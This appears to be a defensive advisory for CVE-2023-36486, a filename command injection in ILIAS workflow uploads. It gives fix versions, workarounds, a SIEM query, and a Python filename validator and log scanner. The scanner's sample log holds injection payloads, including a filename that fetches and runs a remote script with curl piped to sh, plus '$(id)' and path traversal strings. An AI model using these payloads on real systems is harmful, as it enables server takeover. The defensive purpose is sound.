CVE-2023-36486
📋 TL;DR
This vulnerability allows remote authenticated users to execute arbitrary system commands on the ILIAS application server by uploading a workflow definition file with a crafted filename that is passed, unsanitized, into an operating-system command. The attacker needs valid credentials and access to the workflow-engine upload, but can then run commands as the web server user (the account PHP runs under), which puts the whole host at risk. This affects ILIAS e-learning platforms running vulnerable 7.x and 8.x versions.
💻 Affected Systems
- ILIAS Learning Management System
📦 What is this software?
ILIAS is an open-source, web-based learning management system written in PHP, developed and maintained by the ILIAS open source community. The workflow engine affected here is an administration-level component that accepts uploaded workflow definition files.
⚠️ Risk & Real-World Impact
Worst Case
Full server compromise leading to data theft, lateral movement, ransomware deployment, or complete system takeover.
Likely Case
Unauthorized command execution allowing data exfiltration, backdoor installation, or service disruption.
If Mitigated
Limited impact if proper file upload validation and user privilege restrictions are in place.
🎯 Exploit Status
Exploitation requires authenticated access and knowledge of workflow file upload functionality.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: ILIAS 7.23 and 8.3
Restart Required: Yes
Instructions:
1. Back up your ILIAS installation and database.
2. Download and install ILIAS 7.23 or 8.3 from the official repository.
3. Follow the ILIAS update documentation for your version.
4. Restart the web server and verify functionality.
🔧 Temporary Workarounds
Disable workflow-engine uploads
Temporarily disable the workflow definition file upload functionality until patching.
# Modify ILIAS configuration to restrict workflow file uploads
# Check ILIAS documentation for the configuration options of your version
Restrict user permissions
Limit which authenticated users can upload workflow definition files. The workflow engine is an administration component, so this comes down to which roles hold access to it in ILIAS role-based access control.
# Review and modify role permissions in the ILIAS administration panel
# Remove workflow upload permissions from every role that does not strictly need them
🧯 If You Can't Patch
- Implement strict file upload validation: accept filenames only against an allow-list (letters, digits, dot, underscore, hyphen, expected extension) rather than trying to deny individual shell metacharacters, and never pass the client-supplied filename to a shell or reuse it on disk; generate a server-side name instead.
- Deploy web application firewall (WAF) rules that inspect the multipart upload body and block workflow definition uploads whose filename contains shell metacharacters (`;`, `|`, `&`, backticks, `$(`, quotes, redirection).
🔍 How to Verify
Check if Vulnerable:
Check your ILIAS version via the administration interface or by examining the installation files. 7.x releases before 7.23 and 8.x releases before 8.3 are vulnerable.
Check Version:
# Check ILIAS version via web interface: Administration > System Information, or
# Check the ILIAS_VERSION constant in the installation directory (typically include/inc.ilias_version.php in ILIAS 7 and 8)
Verify Fix Applied:
After updating, verify the version shows 7.23 or higher, or 8.3 or higher. Test workflow file upload functionality with safe test files.
📡 Detection & Monitoring
Log Indicators:
- Unusual file uploads to workflow-engine endpoints
- System command execution patterns in application or host logs, in particular the web server or PHP-FPM process spawning a shell or other child processes (visible in process auditing such as auditd or EDR telemetry)
- Failed upload attempts with suspicious filenames
Network Indicators:
- HTTP POST requests to workflow file upload endpoints with unusual filenames
- Outbound connections from the application server following file uploads
SIEM Query:
ILIAS dispatches requests through ilias.php with the target class and command in the query string rather than REST-style paths (the reference URLs below show this pattern), and the uploaded filename travels in the multipart body, which web server access logs do not record. Anchor the path filter on the query string (match case-insensitively; class names in ILIAS URLs vary in case) and take the filename field from application or WAF logs that capture it:
source="web_server_logs" AND uri_path="/ilias.php" AND uri_query="*workflow*" AND (filename="*;*" OR filename="*|*" OR filename="*`*" OR filename="*$(*" OR filename="*&*")
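As an added worked example (not ILIAS code and not part of the original advisory), the Python below implements the allow-list filename check recommended under "If You Can't Patch" and applies the same rule to constructed application upload-log records, which is the check the SIEM query above approximates. The accepted extensions (`.bpmn2`, `.bpmn`, `.xml`), the `action=workflow_upload` log format and the sample lines are assumptions for illustration; ILIAS itself is written in PHP, so this demonstrates the logic rather than a drop-in patch.

```python
"""Added example: allow-list validation of workflow definition filenames
and a detector applying the same rule to upload-log records.
Not ILIAS code; the log format, extensions and sample lines are assumed."""
import re
import secrets
from typing import List, Optional, Tuple

# Allow-list: letters, digits, underscore, dot, hyphen; no leading dot
# (hidden files), no separators, and one of the expected workflow
# definition extensions (assumed: BPMN 2.0 XML).
SAFE_NAME = re.compile(
    r"^[A-Za-z0-9_][A-Za-z0-9._-]{0,127}\.(bpmn2|bpmn|xml)$", re.IGNORECASE
)

# Characters that break out of an unquoted shell interpolation: command
# separators, substitution, quoting, redirection and globbing. Whitespace is
# deliberately left out (too common in real filenames to be an indicator on
# its own) and is rejected by the allow-list instead.
SHELL_META = set(';&|`$(){}<>"\'\\*?[]')


def is_safe_workflow_filename(name: str) -> bool:
    """True only for names that match the allow-list exactly."""
    return SAFE_NAME.fullmatch(name) is not None


def rejection_reason(name: str) -> Optional[str]:
    """None when the name is acceptable, otherwise why it was refused."""
    if is_safe_workflow_filename(name):
        return None
    if any(c in SHELL_META for c in name):
        return "shell-metacharacters"
    if "/" in name or ".." in name:
        return "path-traversal"
    return "not-allowlisted"


def server_side_name(original: str) -> str:
    """Validate the client name, then discard it: only the extension is kept
    and the basename is random, so nothing attacker-controlled reaches the
    filesystem or a command line."""
    reason = rejection_reason(original)
    if reason is not None:
        raise ValueError(f"rejected {original!r}: {reason}")
    ext = original.rsplit(".", 1)[1].lower()
    return f"wf_{secrets.token_hex(8)}.{ext}"


# Assumed application log format (constructed for this example); web server
# access logs do not carry the multipart filename, so this must come from
# the application or a WAF that logs it.
LOG_LINE = re.compile(
    r'^(?P<ts>\S+) user=(?P<user>\d+) action=workflow_upload '
    r'filename="(?P<filename>[^"]*)" status=(?P<status>\d+)$'
)


def scan_upload_log(lines: List[str]) -> List[Tuple[str, int, str, str]]:
    """Return (timestamp, user id, filename, reason) for every upload whose
    client filename fails the allow-list. Lines for other actions are skipped."""
    findings = []
    for line in lines:
        m = LOG_LINE.match(line)
        if m is None:
            continue
        reason = rejection_reason(m["filename"])
        if reason is not None:
            findings.append((m["ts"], int(m["user"]), m["filename"], reason))
    return findings


# Constructed sample records: one benign upload, injection attempts via ';'
# and '$()', a traversal attempt, two non-conforming names, one unrelated line.
SAMPLE_LOG = [
    '2023-12-01T10:02:11Z user=1042 action=workflow_upload filename="leave_request.bpmn2" status=200',
    '2023-12-01T10:05:47Z user=1042 action=workflow_upload filename="x.bpmn2; curl http://203.0.113.7/s.sh | sh" status=200',
    '2023-12-01T10:06:02Z user=2201 action=workflow_upload filename="a$(id).bpmn2" status=200',
    '2023-12-01T10:07:30Z user=2201 action=workflow_upload filename="../../tmp/evil.bpmn2" status=200',
    '2023-12-01T10:09:15Z user=3300 action=workflow_upload filename="Approval Flow v2.bpmn2" status=200',
    '2023-12-01T10:09:40Z user=3300 action=workflow_upload filename="definition.docx" status=200',
    '2023-12-01T10:10:00Z user=3300 action=login status=200',
]

if __name__ == "__main__":
    for ts, user, name, reason in scan_upload_log(SAMPLE_LOG):
        print(f"{ts} user={user} {reason}: {name!r}")
    print("stored as", server_side_name("leave_request.bpmn2"))
```

The detector distinguishes outright injection attempts (shell metacharacters) from merely non-conforming names, so an analyst can page on the former and review the latter in bulk; the server-side rename is the actual fix pattern, since a name the server minted itself cannot carry an injection no matter how it is later used.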
🔗 References
- https://docu.ilias.de/ilias.php?baseClass=ilrepositorygui&cmdNode=xd:kx:54&cmdClass=ilBlogPostingGUI&cmd=previewFullscreen&ref_id=3439&prvm=fsc&bmn=2023-12&blpg=786
- https://github.com/ILIAS-eLearning/ILIAS/pull/5987
- https://github.com/ILIAS-eLearning/ILIAS/pull/5988